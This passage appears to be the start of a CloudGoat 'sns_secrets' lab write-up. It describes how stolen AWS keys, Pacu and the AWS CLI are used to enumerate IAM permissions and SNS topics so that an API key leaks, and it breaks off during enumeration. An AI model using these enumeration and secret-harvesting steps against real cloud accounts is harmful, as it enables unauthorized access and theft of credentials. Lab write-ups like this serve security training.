🥷 CloudGoat: SNS Secrets: Write-up: Exploiting SNS subscriptions to leak API keys

🥷 CloudGoat: SNS Secrets Write-up: Exploiting SNS subscriptions to leak API keys 🧭 Overview Scenario: sns_secrets \ Platform: CloudGoat (Rhino Security Labs) \ Tools: Pacu + AWS CLI \ Objective: Enumerate SNS topics, subscribe to leak secrets, and access protected API Gateway endpoints. ⚔️ Attack Path Summary SNS User → IAM Enum → SNS Enum → Subscribe to Topic → Receive API Key → API Gateway Enum → Access Protected Endpoint → Flag 🔑 Phase 1: Initial Access Configure Profile aws configure --profile sns_secrets # Access Key: AKIA**************** # Secret Key: 7C30FWO69LHE8JZt7RcZ******************** Validate Credentials aws sts get-caller-identity --profile sns_secrets { "UserId" : "AIDA****************" , "Account" : "7912********" , "Arn" : "arn:aws:iam::7912********:user/cg-sns-user-cgid38umo4q95r" } 🔎 Phase 2: IAM Enumeration Launch Pacu and Import Keys pacu Pacu > import_keys sns_secrets Enumerate Permissions Pacu > run iam__enum_permissions Pacu > whoami { "UserName" : "cg-sns-user